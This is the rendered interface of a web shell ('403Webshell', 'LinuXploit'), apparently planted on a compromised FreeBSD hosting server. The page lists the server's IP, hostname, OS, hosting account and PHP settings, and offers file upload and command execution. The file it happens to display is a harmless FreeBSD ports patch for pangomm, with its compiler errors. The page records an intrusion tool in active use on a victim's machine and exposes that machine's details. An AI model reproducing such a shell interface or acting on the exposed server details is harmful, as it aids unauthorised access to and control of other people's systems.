403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/x11-toolkits/pangomm/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/x11-toolkits/pangomm/files/patch-pango_pangomm_attributes.h
https://gitlab.gnome.org/GNOME/pangomm/-/commit/a8ab02ac9b96
https://gitlab.gnome.org/GNOME/pangomm/-/commit/c098f35144ff

attrlist.cc:38:20: error: use of undeclared identifier 'pango_parse_markup'
  gboolean bTest = pango_parse_markup(markup_text.c_str(), -1 /* means null-terminated */, accel_marker,
                   ^
attrlist.cc:65:20: error: use of undeclared identifier 'pango_parse_markup'
  gboolean bTest = pango_parse_markup(markup_text.c_str(), -1 /* means null-terminated */, accel_marker,
                   ^

--- pango/pangomm/attributes.h.orig	2016-08-19 13:58:37 UTC
+++ pango/pangomm/attributes.h
@@ -30,6 +30,9 @@
 #include <pangomm/color.h>
 #include <pangomm/fontdescription.h>
 #include <pango/pango-attributes.h>
+#if __has_include(<pango/pango-markup.h>)
+#include <pango/pango-markup.h>
+#endif
 #include <glibmm/slisthandle.h>
 
 

Youez - 2016 - github.com/yon3zu
LinuXploit